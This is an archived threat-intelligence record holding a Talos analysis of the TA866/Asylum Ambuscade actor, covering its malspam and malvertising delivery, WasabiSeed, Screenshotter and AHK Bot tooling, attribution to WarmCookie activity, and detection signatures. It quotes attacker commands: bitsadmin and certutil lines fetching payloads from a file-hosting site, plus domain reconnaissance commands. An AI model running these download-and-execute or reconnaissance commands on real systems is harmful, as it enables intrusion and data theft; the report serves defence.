{ "id": "2f69db8b-aa33-4f59-8268-baee4d24cde2", "created_at": "2026-04-06T00:14:24.469998Z", "updated_at": "2026-04-10T03:36:47.761899Z", "deleted_at": null, "sha1_hash": "c0b530039c1ac9f45c0953bfe031a810814df134", "title": "Highlighting TA866/Asylum Ambuscade Activity Since 2021", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2588120, "plain_text": "Highlighting TA866/Asylum Ambuscade Activity Since 2021\r\nBy Edmund Brumaghin\r\nPublished: 2024-10-23 · Archived: 2026-04-05 21:22:46 UTC\r\nWednesday, October 23, 2024 06:02\r\nTA866 (also known as Asylum Ambuscade) is a threat actor that has been conducting intrusion operations\r\nsince at least 2020. \r\nTA866 has frequently relied on commodity and custom tooling to facilitate post-compromise activities.\r\nThese tools often perform specific functions and are deployed and used as needed in the context of specific\r\nintrusions. \r\nCisco Talos assesses with high confidence that TA866 frequently leverages business relationships with\r\nother threat actors across various stages of their attacks to help them achieve their mission objective(s). \r\nWe assess with high confidence that recent post-compromise intrusion activity associated with\r\nWarmCookie/BadSpace is related to previous post-compromise activity that we attribute to TA866. \r\nWe assess that WarmCookie was likely developed by the same threat actor that developed the Resident\r\nbackdoor that was delivered in previous intrusions that we attribute to TA866. \r\nWho is TA866? \r\nTA866, also called Asylum Ambuscade, is a threat actor that has been observed conducting intrusion operations\r\nsince at least 2020. TA866 has historically been associated with financially motivated malware campaigns.\r\nHowever, prior reporting indicates that they may also conduct espionage-related activities. Cisco Talos has been\r\nmonitoring and analyzing the malware distribution campaigns, and post-compromise intrusion activity associated\r\nwith TA866 and has observed continued evolution in the tooling and tactics, techniques and procedures (TTPs)\r\nemployed by this threat actor since early 2023.  \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 1 of 20\n\nThroughout 2023, these malware campaigns typically relied on malspam or malvertising to facilitate the delivery\r\nof malicious content to potential victims. In many cases, this content is used to redirect victims to traffic\r\ndistribution systems (TDS), such as 404 TDS, operated by threat actors offering malware installation services.  \r\nThis is followed by the deployment of a variety of malicious components. Since at least early 2023, this has\r\ntypically included WasabiSeed, ScreenShotter and AHK Bot. Based on analysis of post-compromise activity\r\nassociated with this tooling, we assess with high confidence that TA866 also sometimes deploys a persistent\r\nbackdoor called Resident, CSharp-Streamer-RAT, Cobalt Strike and Rhadamanthys on compromised systems. To\r\nenable the performance of various post-compromise enumeration and reconnaissance activities, we have also\r\nobserved the use of utilities such as AdFind and network scanners. TA866 also commonly deploys remote access\r\nsolutions on infected systems such as AnyDesk and Remote Utilities. \r\nWe have observed continued ongoing evolution in the implementation of the malware tooling leveraged by TA866\r\nthat enables them to operate more effectively once they obtain initial access. This demonstrates an adversary that\r\nis constantly evolving as they attempt to gain access to corporate networks and pursue their mission objective(s).  \r\nWhile analyzing recent WarmCookie/BadSpace activity, we observed a case in early 2024 where Cobalt Strike\r\nand CSharp-Streamer-RAT were deployed as follow-on payloads following the initial WarmCookie infection. The\r\nSSL certificate used on the CSharp-Streamer-RAT C2 server ( 185[.]73[.]124[.]164 ) appeared to have been\r\ngenerated using information programmatically populated using an algorithm defined by the threat actor. This same\r\nalgorithm appears to have been used on three additional CSharp-Streamer-RAT C2 servers, one of which\r\n( 109[.]236[.]80[.]191 ), was the C2 server for a CSharp-Streamer-RAT sample observed in a prior intrusion in\r\n2023 that we attribute to TA866.  \r\nTypical distribution campaigns \r\nAs previously mentioned, initial access to target environments is typically obtained by TA866 through\r\nsuccessfully infecting systems via either malspam or malvertising. Throughout 2022 and 2023, we frequently\r\nobserved TA866 relying on both methods for initiating the infection process. \r\nIn the case of malspam, we have observed TA866 relying on various lure themes and techniques, including email\r\nthread hijacking, a technique where threat actors leverage replies to legitimate email threads that the recipient was\r\npreviously a part of to increase the legitimacy of the malicious email. Prior reporting suggests that, in previous\r\ncampaigns, the malspam may have been associated with a spam botnet operated by TA571.  \r\nIn most cases, the threat actor embedded malicious hyperlinks, either directly into the body of the email message,\r\nor within an attached document, typically PDFs or Microsoft Publisher files. Below is an example of an email\r\nfrom an earlier TA866 campaign. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 2 of 20\n\nIn the case of malvertising, we have observed instances of users being infected while browsing for legitimate\r\nsoftware downloads for applications such as TeamViewer when the infection process began. Prior reporting\r\nindicates that TA866 has been observed leveraging malicious Google advertisements and SEO poisoning to infect\r\nvictims. \r\nThe hyperlinks in these cases pointed to entry points into the 404 TDS. The 404 TDS is a traffic distribution\r\nsystem that enables adversaries to deploy rapidly changing infrastructure which is used to direct potential victims\r\nto malicious content, in many cases, malware.  \r\nIn the case of 404 TDS, the URLs accessed typically return an HTTP/404 error code, but a meta refresh is used to\r\nredirect victims to additional intermediary servers. These intermediary servers are typically responsible for\r\nidentifying/querying information about the visiting systems to determine whether to redirect them to the malicious\r\ncontent or simply to a benign destination such as a search engine or email provider. \r\nIn cases where malicious TDS redirection occurs, victims are delivered malicious payloads, which in the case of\r\nanalyzed TA866 activity, are typically the malicious JavaScript-based downloaders used to initiate the infection\r\nprocess. \r\nInfection chains and tooling \r\nThe most commonly observed infection chain associated with intrusions we attribute to TA866 is typified by the\r\nuse of multiple distinct stages of custom malware, each responsible for conducting different actions to facilitate\r\nadditional data gathering, reconnaissance and enable the threat actor flexibility in determining if a given infected\r\nsystem is a high-value target and whether they should operate further in compromised environments.\r\nWe have observed cases where extended periods of time elapse between when the threat actor gains initial access\r\nand persistence within compromised environments and the delivery of additional payloads, followed by the\r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 3 of 20\n\nconduction of post-compromise activity within the environment. Over time we have observed variations in the\r\ninfection chains used following initial compromise and assess that TA866 likely chooses to deploy tools in\r\nspecific situations or target environments as needed while operating towards their longer-term mission\r\nobjective(s). While variations do exist, we have observed consistent use of various tooling over the past couple of\r\nyears, as described in the following sections. \r\nJavaScript downloaders \r\nIn most observed cases, the infection process begins with the delivery of a malicious JavaScript downloader via\r\nthe distribution process(es) previously described. This downloader is responsible for retrieving the next stage of\r\nthe infection chain, which is often MSI packages containing a malware payload called WasabiSeed. The\r\nobfuscation used to hide the JavaScript being executed has varied across campaigns over time. An example of one\r\nis shown below. \r\nThis code is responsible for initiating an HTTPS connection to retrieve and execute the WasabiSeed MSI package.\r\nIn this case, the URL hosting the MSI package was: \r\nhxxps[:]//perfectsystems-ltd[.]com/x-css/cd.msi\r\nOnce downloaded, the MSI is passed to MsiExec to execute the next stage of the process. \r\nWasabiSeed  \r\nWasabiSeed effectively functions as another downloader stage that is used to retrieve additional payloads from\r\nattacker-controlled servers. This is performed by a VBScript included in the MSI package delivered to infected\r\nsystems. \r\nDuring execution, the MSI creates a subfolder within %PROGRAMDATA% and copies a malicious VBScript into this\r\nlocation. The name of the subdirectory and VBScript file varies across analyzed samples. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 4 of 20\n\nA CustomAction[.]idt is defined, which executes the VBScript using wscript[.]exe when the MSI is run.\r\nThe VBScript is stored in a CAB archive contained within the MSI package. Persistence is achieved via the use of\r\nan LNK shortcut that is dropped into the Startup directory on the system, ensuring that WasabiSeed is executed\r\neach time the system reboots. When run, it continuously reaches out to obtain arbitrary payloads in the form of\r\nMSI packages that are then executed by MsiExec to infect systems with additional malware. \r\nThe URL used by this payload retrieval process is randomized using the drive serial number of the infected\r\nsystem, making it unique to each system. This continuous polling allows the delivery of arbitrary payloads at the\r\ndiscretion of the threat actor at any point following initial access. In most cases, we observed subsequent delivery\r\nof an additional MSI containing a malware tool called Screenshotter.  \r\nScreenshotter \r\nScreenshotter is a malware family used to generate periodic screenshots from infected systems which are\r\ntransmitted to the threat actor over HTTP. We have observed the delivery of multiple variants of Screenshotter and\r\nhave identified implementations of the malware in a variety of programming languages, including JavaScript and\r\nPython. \r\nWe also identified an implementation of Screenshotter using an AutoHotKey script, likely to enable this\r\nfunctionality directly within AHK Bot, which is also often delivered during the infection process and described in\r\nthe next section. \r\nIn both the JavaScript and Python implementations of Screenshotter, the malware is delivered within an MSI\r\npackage. The MSI associated with the JavaScript implementation contains two JavaScript files, “ app[.]js ” and\r\n“ index[.]js ” as well as a legitimate screen capture binary, typically IrfanView. Like WasabiSeed, a\r\nCustomAction[.]idt is used to execute the JavaScript files using wscript[.]exe , as shown below. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 5 of 20\n\nThe MSI creates a subdirectory with %PROGRAMDATA% and copies the Screenshotter components into it. The script\r\n“ app[.]js ” is responsible for executing IrfanView to capture screenshots periodically. It is also responsible for\r\nensuring that only one instance of Screenshotter is running at a time. \r\nThe script “ index[.]js ” is responsible for facilitating the transmission of captured screenshots to the adversary\r\nvia C2. \r\nLike WasabiSeed, the URL used is generated using the drive serial number of the system, which is appended to\r\nthe end of the URL used for exfiltration, as shown below.  \r\nhttp://\u003cC2 Server\u003e/screenshot/\u003cDrive Serial Number\u003e\r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 6 of 20\n\nWhile we have observed variations in the JavaScript implementation of Screenshotter, in all cases the overall\r\nfunctionality and operation of the malware is consistent. \r\nThe Python implementation also functions similarly with some notable differences. The CAB archive contains a\r\nlegitimate Python installation as well as a Python script ( screen1[.]pyw ) that takes the place of IrfanView as\r\nused in the JavaScript implementation. A CustomAction[.]idt is used to execute a VBScript, as shown below. \r\nThe VBScript executes the Python binary and passes the screen capturing Python script as a parameter.  \r\nThe Python script captures screenshots and transmits them to the C2 server, as shown in the example below. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 7 of 20\n\nScreenshotter enables the collection of additional information such as typical system usage and potentially\r\nsensitive information being displayed on screen and allows the threat actor to determine whether they should\r\ncontinue to operate within the system and associated network environment. In a subset of cases analyzed, AHK\r\nBot was also delivered and is described in the next section. \r\nAHK Bot \r\nAlong with the deployment of WasabiSeed and Screenshotter, we have frequently observed the deployment of an\r\nAutoHotKey (AHK) based malware called AHK Bot.   \r\nAHK Bot is a modular malware family that uses AHK scripts to implement various functionality required by the\r\nadversary. While there are likely additional scripts that have been developed and deployed by the threat actor, we\r\nidentified several used in previous intrusion activity as well as in public malware repositories that provide a\r\nglimpse into the functionality available with AHK Bot. We assess that these scripts were likely developed by the\r\nauthor of AHK Bot for delivery and use on systems previously infected with AHK Bot.  \r\nThese scripts perform the following actions: \r\nLooper (Persistence and periodic C2 polling). \r\nSystem enumeration. \r\nScreenshotter. \r\nDomain identification. \r\nSecondary C2 connection establishment. \r\nKeystroke logging. \r\nCredential theft. \r\nHVNC deployment and removal. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 8 of 20\n\nRemote access software deployment and removal. \r\nAHK Bot is typically delivered to previously infected systems via MSI files which contain the legitimate\r\nAutoHotKey binary used to execute AHK scripts, as well as a base AHK script that is referred to as the “looper”\r\nin prior reporting. When executed, it creates a subdirectory within C:\\ProgramData\\ and copies the AutoHotKey\r\nbinary, as well as the main AHK script into it. It then executes the AHK script and begins polling C2 to wait for\r\nadditional instructions/scripts to execute.  \r\nLooper \r\nThis script is responsible for establishing persistence for AHK Bot by creating a LNK shortcut within the Startup\r\ndirectory on the system. It also performs periodic polling to an attacker-defined C2 server to retrieve additional\r\nAHK scripts for execution on the system.  \r\nAs this process repeats each time the system reboots, this provides a robust, modular mechanism for threat actors\r\nto further interact with the system as desired.  \r\nSystem enumeration \r\nThe system and hardware enumeration AHK script uses Windows Management Instrumentation (WMI) to collect\r\ninformation about the hardware and software configuration of the infected system. The following information is\r\ncollected: \r\nGeneral system information (OS, hardware devices present, location, etc.). \r\nHard disk configuration. \r\nProcessor information. \r\nRAM configuration. \r\nGPU configuration. \r\nNetworking device information. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 9 of 20\n\nFirewall, anti-virus and anti-spyware software information. \r\nRunning process list. \r\nThis information is written to a file ( hardware[.]txt ) present within the current working directory of the script.\r\nThis file is then uploaded to the C2 server via HTTP POST requests.  \r\nScreenshotter (deskscreen) \r\nThis AHK script is effectively an alternative implementation of Screenshotter written directly for execution by\r\nAHK Bot. It captures screenshots of the infected system and transmits them to the C2 server, like the versions of\r\nScreenshotter implemented in JavaScript or Python. Consistent with what was observed in the Python\r\nimplementation of Screenshotter, this version does not require the use of an external screen capturing utility and\r\nthe screenshot capture is implemented directly within the AHK script.  \r\nCaptured screenshots are transmitted to the attacker’s C2 server, as shown below. \r\nThis version of Screenshotter also features logging capabilities and supports the transmission of status logs to the\r\nattacker. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 10 of 20\n\nThe code associated with this implementation of Screenshotter also contains comments written in Russian, as\r\nshown below. \r\nThe main functionality of the script is comparable with other implementations of Screenshotter seen previously. \r\nDomain Identification (domain) \r\nThis script is simply used to retrieve the domain membership of an infected system. The domain is retrieved via\r\nWindows Management Instrumentation (WMI) and then transmitted to the C2 server via HTTP POST requests as\r\nshown below. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 11 of 20\n\nConnect \r\nThe connect script is simply used to establish a connection to an attacker-controlled server and send connection\r\nstatus logs and receive an HTTP response from the server, as shown below. \r\nKeystroke logging \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 12 of 20\n\nThis script can log keystrokes on infected systems and send a log of user input to the attacker. First it checks to see\r\nif the keylogger process already exists on the system. If not, it attempts to retrieve the AutoHotKey binary from an\r\nattacker-controlled server. \r\nThe AHK script has a fully implemented keylogger capability. Collected keystrokes are transmitted via HTTP\r\nPOST requests. \r\nThe keylogger also features persistence, which is established via the creation of a new Windows shortcut LNK\r\nwithin the StartUp directory on infected systems, allowing the keylogger to be executed each time the system\r\nreboots. \r\nCredential theft (_passwords) \r\nThis script is a browser password stealer that has been implemented as an AHK script. It enables the threat actor to\r\nretrieve cached credentials from common browsers that may be installed and in use on infected systems.   \r\nThe script begins by setting the download location for the SQLite3 DLL required to parse browser credential\r\nstores. It also retrieves the serial number of the C:\\ drive on the system. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 13 of 20\n\nIt then checks to determine if the DLL currently exists on the infected system. If not, it attempts to retrieve it from\r\nan attacker-controlled server. \r\nIt then attempts to retrieve browsing history and passwords from Internet Explorer, Mozilla Firefox and\r\nChromium-based browsers using multiple methods. \r\nStatus logging and credential information is transmitted to the C2 server via HTTP communications. \r\nComments present in the code reference Russian language knowledge base articles.\r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 14 of 20\n\nHVNC deployment and removal \r\nWe have observed two AHK scripts that are used to either deploy or remove hVNC on infected systems. To\r\nachieve this, the deployment script attempts to download 7-Zip and hVNC and uses 7-Zip to extract the hVNC\r\nfiles. \r\nThe hVNC application is then executed. Logs associated with the deployment are transmitted to the command and\r\ncontrol (C2) via HTTP POST requests.  \r\nThe AHK script for hVNC removal simply uses taskkill.exe to terminate the hVNC and 7-Zip processes\r\nrunning on the system. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 15 of 20\n\nRemote access software deployment \u0026 removal \r\nLike what was described for hVNC, two AHK scripts are also used to deploy the commercial Remote Utilities\r\nremote access software to infected systems, enabling persistent remote access for the attacker. The scripts attempt\r\nto retrieve Remote Utilities from an attacker-controlled server and install it on the system for use to remotely\r\ninteract with the system.  \r\nLikewise, log messages generated during this process are sent to C2 via HTTP POST requests to provide status\r\nupdates and alert attackers of any failures that may have been encountered during the deployment. \r\nPost-compromise activities \r\nFollowing successful system compromise, we have observed TA866 conducting various post-compromise\r\nactivities. In some cases, extended periods of time were observed between initial access and the deployment of\r\nfollow-on payloads described in the previous section. In many cases, once the actor was on the system they began\r\nto conduct information gathering and reconnaissance within the environment, using a combination of built-in and\r\nlegitimate Windows utilities.  \r\nWe have seen execution of a variety of system commands we attribute to the adversary operating on the\r\nsystem. This includes but is not limited to the following:\r\ncmd.exe /c chcp 65001 \u0026\u0026 net group Domain Computers /domain\r\ncmd.exe /c chcp 65001 \u0026\u0026 set l  \r\ncmd.exe /c chcp 65001 \u0026\u0026 nltest /DOMAIN_TRUSTS  \r\nipconfig /all\r\nwhoami  \r\nwhoami /groups  \r\nsysteminfo  \r\nOther utilities like AdFind and network-scanning applications have been deployed and used. \r\nIn a limited number of cases, we have also observed the deployment of additional malware including: \r\nCobalt Strike \r\nRhadamanthys \r\nCSharp-Streamer-RAT \r\nResident backdoor \r\nRemote access software (TeamViewer, Remote Utilities) \r\nIn the case of Rhadamanthys, we have observed AHK Bot being used to retrieve DLL-based shellcode loaders and\r\nexecute them on the system to load Rhadamanthys into memory.  \r\nRhadamanthys is an information stealer that can be used to collect and exfiltrate a variety of sensitive data from\r\ninfected systems. It is described extensively in prior reporting.  \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 16 of 20\n\nC:\\Windows\\system32\\bitsadmin.exe /transfer\r\nmydownloadjob /download /priority normal hxxps[:]//temp[.]sh/ThuNJ/2[.]dll\r\nWe have also observed the use of native Windows binaries, like certutil.exe , being used to retrieve and\r\nexecute Resident backdoor on systems.  \r\nWhile not specifically attributed in prior reporting, based on analysis of previous intrusion activity that we\r\nattribute to TA866 during the period in which Resident was deployed, we assess with high confidence that TA866\r\nwas responsible for its deployment in cases we analyzed. Likewise additional TTPs described in the reporting\r\nmatch those we have observed and attributed to TA866 since 2023. \r\ncertutil -urlcache -split -f hxxps[:]//temp[.]sh/esuJB/resident[.]exe C:\\programdata\\res.exe\r\nAs described in prior reporting, Resident is a backdoor that can be used to download and execute additional\r\npayloads on victim systems. \r\nAcross the intrusion activity analyzed, we observed the threat actor making frequent use of file hosting sites such\r\nas hxxps[:]//temp[.]sh for the purpose of payload hosting and delivery. We also noted consistency in the URL\r\nstructure used by various components in the infection chains to retrieve dependencies needed for them to execute\r\nproperly.  \r\nTargeting/victimology \r\nWhile long-term targeting associated with the distribution campaigns appears indiscriminate, most of the cases\r\nwhere follow on payloads have been observed were in the United States, with additional cases spread across\r\nCanada, United Kingdom, Germany, Italy, Austria and the Netherlands. The most affected industry was the\r\nmanufacturing sector, followed closely by government and financial services, but organizations across many\r\nindustries have also been affected.  \r\nLinks to recent intrusion activity \r\nWe have observed overlaps between historic TA866 intrusion activity and recent WarmCookie/BadSpace\r\ncampaign activity.  \r\nMost notably, we have observed the following: \r\nWe have observed CSharp-Streamer-RAT delivered as a follow-on payload in TA866 intrusion activity\r\nfrom 2023 as well as WarmCookie intrusion activity in 2024. The C2 servers used by both CSharp-Streamer-RAT samples shared SSL characteristics that appear to have been programmatically generated in\r\na consistent manner. Leveraging internet census data, we identified a cluster of four total C2 servers with\r\nSSL certificates matching this algorithm. \r\nFollowing an analysis of both Resident backdoor and WarmCookie, we assess that the same threat actor\r\nlikely authored both. In several cases, core functionality is implemented in a consistent manner across both\r\nResident backdoor samples and recent WarmCookie samples.  \r\nBased on our analysis, we assess that TA866 is likely associated with both clusters of malicious activity.  \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 17 of 20\n\nPrior reporting also indicates that the CSharp-Streamer-RAT C2 server ( 109[.]236[.]80[.]191 ) observed in\r\nprevious intrusion activity that we attribute to TA866 has also been seen in intrusion activity linked to IcedID and\r\nALPHV ransomware. \r\nIn several cases, we observed the repeated deployment of Cobalt Strike beacons following successful compromise\r\nof organizational networks. We have observed overlaps in the distribution infrastructure used and the cluster of\r\ninfrastructure associated with ShadowSyndicate in prior reporting. \r\nMitre ATT\u0026CK Techniques \r\nReconnaissance  \r\nT1589.002 Gather Victim Identity Information: Email Addresses  \r\nResource Development  \r\nT1586.002 Compromise Accounts: Email Accounts  \r\nT1608.006 Stage Capabilities: SEO Poisoning  \r\nT2583.008 Acquire Infrastructure: Malvertising  \r\nInitial Access  \r\nT1566 Phishing  \r\nT1566.001 Spearphishing Attachment  \r\nT1566.002 Spearphishing Link  \r\nExecution  \r\nT1059.001 Command and Scripting Interpreter: PowerShell  \r\nT1059.003 Command and Scripting Interpreter: Windows Command Shell  \r\nT1047 Windows Management Instrumentation  \r\nPersistence  \r\nT1574.002 Hijack Execution Flow: DLL Side-Loading  \r\nDefense Evasion  \r\nT1218.007 System Binary Proxy Execution: Msiexec  \r\nDiscovery  \r\nT1069.002 Permission Groups Discovery: Domain Groups  \r\nT1016 System Network Configuration Discovery  \r\nT1482 Domain Trust Discovery  \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 18 of 20\n\nT1018 Remote System Discovery  \r\nT1057 Process Discovery  \r\nT1007 System Service Discovery  \r\nT1518.001 Software Discovery: Security Software Discovery  \r\nT1124 System Time Discovery  \r\nT1082 System Information Discovery  \r\nT1033 System Owner / User Discovery  \r\nCommand and Control  \r\nT1105 Ingress Tool Transfer  \r\nT1219 Remote Access Software  \r\nT1071.001 Application Layer Protocol: Web Protocols \r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them. \r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 19 of 20\n\nAdditional protection with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.  \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. \r\nThe following Snort rule(s) have been developed to detect activity associated with this malicious activity.  \r\nSnort 2 SIDs: 64139, 64140, 64141, 64142, 64143, 64144, 64145, 64146, 64147, 64148, 64149, 64150,\r\n64151, 64152, 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162.   \r\nSnort 3 SIDs: 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162, 301044, 301045,\r\n301046, 301047, 301048, 301049, 301050.  \r\nThe following ClamAV signatures have been developed to detect activity associated with this malicious activity.  \r\nJs.Downloader.Agent-10022279-0  \r\nVbs.Downloader.Agent-10022291-0  \r\nWin.Trojan.WasabiSeed-10022304-0  \r\nJs.Trojan.Screenshotter-10022306-0  \r\nJs.Trojan.Agent-10022307-0  \r\nWin.Trojan.Lazy-10022308-0  \r\nWin.Trojan.Screenshotter-10022309-0  \r\nPUA.Win.Tool.NetPing-10022493-0  \r\nWin.Malware.CobaltStrike-10022494-0  \r\nPUA.Win.Tool.AutoHotKey-10022305-1  \r\nPUA.Win.Tool.RemoteUtilities-9869515-0  \r\nPUA.Win.Tool.AdFind-9962378-0   \r\nTxt.Downloader.AHKBot-10024463-0  \r\nPs1.Malware.CobaltStrike-10024466-0  \r\nWin.Infostealer.Rhadamanthys-10024467-0  \r\nTxt.Infostealer.Rhadamanthys-10024468-0  \r\nWin.Backdoor.Agent-10025011-0  \r\nVbs.Trojan.Screenshotter-10025015-0  \r\nWin.Malware.Warmcookie-10036688-0 \r\nWin.Malware.CSsharpStreamer-10036641-0 \r\nIndicators of Compromise \r\nIndicators of compromise associated with TA866 activity can be found in our GitHub repository here. \r\nSource: https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nhttps://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/" ], "report_names": [ "highlighting-ta866-asylum-ambuscade" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "eae4b6c4-8a61-4303-becc-b11f00b5bfda", "created_at": "2024-02-22T02:00:03.772831Z", "updated_at": "2026-04-10T02:00:03.592334Z", "deleted_at": null, "main_name": "ShadowSyndicate", "aliases": [], "source_name": "MISPGALAXY:ShadowSyndicate", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7183913d-9a43-4362-96e1-9af522b6ab84", "created_at": "2024-06-19T02:00:04.377344Z", "updated_at": "2026-04-10T02:00:03.653777Z", "deleted_at": null, "main_name": "TA571", "aliases": [], "source_name": "MISPGALAXY:TA571", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "59d91b6f-bccf-4ae4-a14c-028b198848b6", "created_at": "2023-03-10T02:01:52.119563Z", "updated_at": "2026-04-10T02:00:03.36177Z", "deleted_at": null, "main_name": "TA866", "aliases": [], "source_name": "MISPGALAXY:TA866", "tools": [ "Screenshotter", "AHK Bot", "WasabiSeed" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434464, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c0b530039c1ac9f45c0953bfe031a810814df134.pdf", "text": "https://archive.orkl.eu/c0b530039c1ac9f45c0953bfe031a810814df134.txt", "img": "https://archive.orkl.eu/c0b530039c1ac9f45c0953bfe031a810814df134.jpg" } }